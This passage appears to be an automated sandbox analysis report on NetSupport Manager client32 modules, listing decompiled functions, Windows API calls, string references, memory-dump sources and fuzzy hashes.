                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressCloseFileFreeHandleLibraryModuleNameProc_strrchr
                                                                                                                                        • String ID: NSM247Ctl.dll$Set Is247=%d$pcictl_247.dll
                                                                                                                                        • API String ID: 3215810784-3459472706
                                                                                                                                        • Opcode ID: 8b57d419eb0cbf1a727b1cb863b4fe23109896a653439d9c26a4029edee13bc7
                                                                                                                                        • Instruction ID: 41edc5693f704a5ed8d687928cf7593a3ba6ce8f62e49b437a8f8cc93e8f127a
                                                                                                                                        • Opcode Fuzzy Hash: 8b57d419eb0cbf1a727b1cb863b4fe23109896a653439d9c26a4029edee13bc7
                                                                                                                                        • Instruction Fuzzy Hash: D511C875A841299FEF208A55DC41BFE7364EF45385F800875EE19A3240EB70DA45CF61
                                                                                                                                        Function 111433B0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 57COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • LoadStringA.USER32(00000000,?,?,00000400), ref: 111433DF
                                                                                                                                        • wsprintfA.USER32 ref: 11143416
                                                                                                                                          • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
                                                                                                                                          • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
                                                                                                                                          • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
                                                                                                                                          • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4598704351.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599013650.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599072476.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599137859.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: wsprintf$ErrorExitLastLoadMessageProcessString
                                                                                                                                        • String ID: #%d$..\ctl32\util.cpp$i < _tsizeof (buf)
                                                                                                                                        • API String ID: 1985783259-2296142801
                                                                                                                                        • Opcode ID: ff2748ac2aec15e09c4bdc6ca979aa6eb9a6b499c93e777d6c60cf8ab22b526a
                                                                                                                                        • Instruction ID: c1d41daf5ac04f5e509db8cc8d6ef6429d5cf2497d86e7a71f1ea6c6f60715f8
                                                                                                                                        • Opcode Fuzzy Hash: ff2748ac2aec15e09c4bdc6ca979aa6eb9a6b499c93e777d6c60cf8ab22b526a
                                                                                                                                        • Instruction Fuzzy Hash: 2411E5FAE01228A7C711CAA59D80FEEF77C9B45708F544065FB08B3181EA30AA0587A4
                                                                                                                                        Function 110312C0 Relevance: 7.6, APIs: 1, Strings: 4, Instructions: 78COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • wsprintfA.USER32 ref: 11031376
                                                                                                                                          • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
                                                                                                                                          • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
                                                                                                                                          • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
                                                                                                                                          • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4598704351.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599013650.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599072476.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599137859.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: wsprintf$ErrorExitLastMessageProcess
                                                                                                                                        • String ID: %s%s.bin$305090$clientinv.cpp$m_pDoInv == NULL
                                                                                                                                        • API String ID: 4180936305-1644303538
                                                                                                                                        • Opcode ID: a91a351a66afc442ede38cb242442a1426f20364587f5a7d661eb96a4c7a4840
                                                                                                                                        • Instruction ID: 6dff70f8b624139b5d8b9928b76f3118b4df96bcfaa22522713f30a32685b050
                                                                                                                                        • Opcode Fuzzy Hash: a91a351a66afc442ede38cb242442a1426f20364587f5a7d661eb96a4c7a4840
                                                                                                                                        • Instruction Fuzzy Hash: 4D2181B5E00705AFD710DF65DC80BAAB7E4EB88758F10857DF825D7681E734A8008B55
                                                                                                                                        Function 11140CE0 Relevance: 7.6, APIs: 5, Instructions: 66COMMONLIBRARYCODE
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetFileAttributesA.KERNEL32(111413B8,00000000,?,111413B8,00000000), ref: 11140CFC
                                                                                                                                        • __strdup.LIBCMT ref: 11140D17
                                                                                                                                          • Part of subcall function 11080BE0: _strrchr.LIBCMT ref: 11080BEE
                                                                                                                                          • Part of subcall function 11140CE0: _free.LIBCMT ref: 11140D3E
                                                                                                                                        • _free.LIBCMT ref: 11140D4C
                                                                                                                                          • Part of subcall function 1115F3B5: HeapFree.KERNEL32(00000000,00000000,?,11167F76,00000000,?,110B7069), ref: 1115F3CB
                                                                                                                                          • Part of subcall function 1115F3B5: GetLastError.KERNEL32(00000000,?,11167F76,00000000,?,110B7069), ref: 1115F3DD
                                                                                                                                        • CreateDirectoryA.KERNEL32(111413B8,00000000,?,?,?,111413B8,00000000), ref: 11140D57
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4598704351.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599013650.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599072476.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599137859.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _free$AttributesCreateDirectoryErrorFileFreeHeapLast__strdup_strrchr
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 398584587-0
                                                                                                                                        • Opcode ID: d6768a18939f6adfd693e8c384a208b25f513479c75e476212dbb50f515d0fbd
                                                                                                                                        • Instruction ID: 9875b16ed77e9f13dc3c5425d13c9245bbbda80c09f4107d02f4537b9d4f833e
                                                                                                                                        • Opcode Fuzzy Hash: d6768a18939f6adfd693e8c384a208b25f513479c75e476212dbb50f515d0fbd
                                                                                                                                        • Instruction Fuzzy Hash: 9101F53B6042161AF301157E6D01BEFBB9C8BC2B6CF284176E98DC6585F756F41A82A2
                                                                                                                                        Function 1100EC70 Relevance: 7.6, APIs: 5, Instructions: 60COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 1100ECA2
                                                                                                                                          • Part of subcall function 1115CFF4: _setlocale.LIBCMT ref: 1115D006
                                                                                                                                        • _free.LIBCMT ref: 1100ECB4
                                                                                                                                          • Part of subcall function 1115F3B5: HeapFree.KERNEL32(00000000,00000000,?,11167F76,00000000,?,110B7069), ref: 1115F3CB
                                                                                                                                          • Part of subcall function 1115F3B5: GetLastError.KERNEL32(00000000,?,11167F76,00000000,?,110B7069), ref: 1115F3DD
                                                                                                                                        • _free.LIBCMT ref: 1100ECC7
                                                                                                                                        • _free.LIBCMT ref: 1100ECDA
                                                                                                                                        • _free.LIBCMT ref: 1100ECED
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4598704351.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599013650.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599072476.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599137859.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _free$ErrorFreeHeapLastLocinfo::_Locinfo_dtor_setlocalestd::_
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3515823920-0
                                                                                                                                        • Opcode ID: 62c2770954d93fd006766d5ae319b04a53202b929f467d8ce75b2ef83ed42ad2
                                                                                                                                        • Instruction ID: 6354e4c6b4ea18464702b145c06536eed7bcdebf3ca81661a54f05b51a131181
                                                                                                                                        • Opcode Fuzzy Hash: 62c2770954d93fd006766d5ae319b04a53202b929f467d8ce75b2ef83ed42ad2
                                                                                                                                        • Instruction Fuzzy Hash: 1E11E2B1D00A559BE7A0CF99C840A0BFBFDEB41614F144A2AE426D3740E731F9048B92
                                                                                                                                        Function 11141F80 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 51COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 11141240: GetModuleFileNameA.KERNEL32(00000000,?,00000104,?), ref: 111412AD
                                                                                                                                          • Part of subcall function 11141240: SHGetFolderPathA.SHFOLDER(00000000,00000026,00000000,00000000,?,?), ref: 111412EE
                                                                                                                                          • Part of subcall function 11141240: SHGetFolderPathA.SHFOLDER(00000000,0000001A,00000000,00000000,?), ref: 1114134B
                                                                                                                                        • wsprintfA.USER32 ref: 11141FAE
                                                                                                                                        • wsprintfA.USER32 ref: 11141FC4
                                                                                                                                          • Part of subcall function 1113F8A0: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,76938400,?), ref: 1113F937
                                                                                                                                          • Part of subcall function 1113F8A0: CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 1113F957
                                                                                                                                          • Part of subcall function 1113F8A0: CloseHandle.KERNEL32(00000000), ref: 1113F95F
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4598704351.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599013650.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599072476.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599137859.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: File$CreateFolderPathwsprintf$CloseHandleModuleName
                                                                                                                                        • String ID: %sNSA.LIC$%sNSM.LIC$NSM.LIC
                                                                                                                                        • API String ID: 3779116287-2600120591
                                                                                                                                        • Opcode ID: 4e6b941dd91801a2435b4bb47ef9bd529b47744a684cc276ea5b71ac848a70c8
                                                                                                                                        • Instruction ID: b8eec695178ba2d1a937c5ef531141e0e56104a00a3206b9e8423c5fe1c12a7b
                                                                                                                                        • Opcode Fuzzy Hash: 4e6b941dd91801a2435b4bb47ef9bd529b47744a684cc276ea5b71ac848a70c8
                                                                                                                                        • Instruction Fuzzy Hash: 9001D4B9E0122D66DB50DBB09D41FEBF7ACCB44608F1001E5ED0997181EE31BA448B95
                                                                                                                                        Function 1113F8A0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 92fileCOMMONLIBRARYCODE
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,76938400,?), ref: 1113F937
                                                                                                                                        • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 1113F957
                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 1113F95F
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4598704351.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599013650.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599072476.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599137859.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CreateFile$CloseHandle
                                                                                                                                        • String ID: "
                                                                                                                                        • API String ID: 1443461169-123907689
                                                                                                                                        • Opcode ID: a2a77767078ddfce535248fde987ff7f5033cfdc2bfe7a17f5ba387350ad47bd
                                                                                                                                        • Instruction ID: 9c86450901ac288abfb1a5416e129d0f3cdd4120216def2344b537bfb16cbc1a
                                                                                                                                        • Opcode Fuzzy Hash: a2a77767078ddfce535248fde987ff7f5033cfdc2bfe7a17f5ba387350ad47bd
                                                                                                                                        • Instruction Fuzzy Hash: F421BE30A0426AAFE312CE38DD54BD9BB949F82324F2041E4F9D5DB1C8EA719A488752
                                                                                                                                        Function 688F6610 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84networkCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 68909BF0: _strncpy.LIBCMT ref: 68909C14
                                                                                                                                        • inet_addr.WSOCK32(?,?,?,?,?,?,00002000,?,00000000), ref: 688F6691
                                                                                                                                        • gethostbyname.WSOCK32(?,?,?,?,?,?,00002000,?,00000000), ref: 688F66A2
                                                                                                                                        • WSAGetLastError.WSOCK32(?,?,?,?,?,?,00002000,?,00000000), ref: 688F66CD
                                                                                                                                        Strings
                                                                                                                                        • Cannot resolve hostname %s, error %d, xrefs: 688F66D6
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorLast_strncpygethostbynameinet_addr
                                                                                                                                        • String ID: Cannot resolve hostname %s, error %d
                                                                                                                                        • API String ID: 2603238076-1802540647
                                                                                                                                        • Opcode ID: 99c6155dbbc65f896cf87b51650ec960f0d18f5e5657f3dba2b2217da87b8fdc
                                                                                                                                        • Instruction ID: cee774b458b08d03f0755c138e11dad0355fb5e93e97f3e97a14a3e0b7fcfa6e
                                                                                                                                        • Opcode Fuzzy Hash: 99c6155dbbc65f896cf87b51650ec960f0d18f5e5657f3dba2b2217da87b8fdc
                                                                                                                                        • Instruction Fuzzy Hash: C821BA35A0421CABDB10DFB4DD40BAAB3F8BF59254F8085A9E959D7240EF34E944C7A1
                                                                                                                                        Function 1102CD10 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 64COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 1105D340: __wcstoi64.LIBCMT ref: 1105D37D
                                                                                                                                        • SetEvent.KERNEL32(?,Client,DisableGeolocation,00000000,00000000,A0A8B03E,?,?,?,Function_00186DCB,000000FF), ref: 1102CDC7
                                                                                                                                          • Part of subcall function 1110C420: wsprintfA.USER32 ref: 1110C454
                                                                                                                                          • Part of subcall function 1110C420: _memset.LIBCMT ref: 1110C477
                                                                                                                                          • Part of subcall function 1110C520: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,7736C3F0,?,1110D1BD,00000000,00000001,?,?,?,000000FF,?,11026F57), ref: 1110C53E
                                                                                                                                        • CreateEventA.KERNEL32 ref: 1102CD8A
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4598704351.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599013650.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599072476.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599137859.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Event$Create$__wcstoi64_memsetwsprintf
                                                                                                                                        • String ID: Client$DisableGeolocation
                                                                                                                                        • API String ID: 2598271332-4166767992
                                                                                                                                        • Opcode ID: 63dd30d7ff77dec508e51da4baa18de7bde6bf43051e4c425e199e23d5428a19
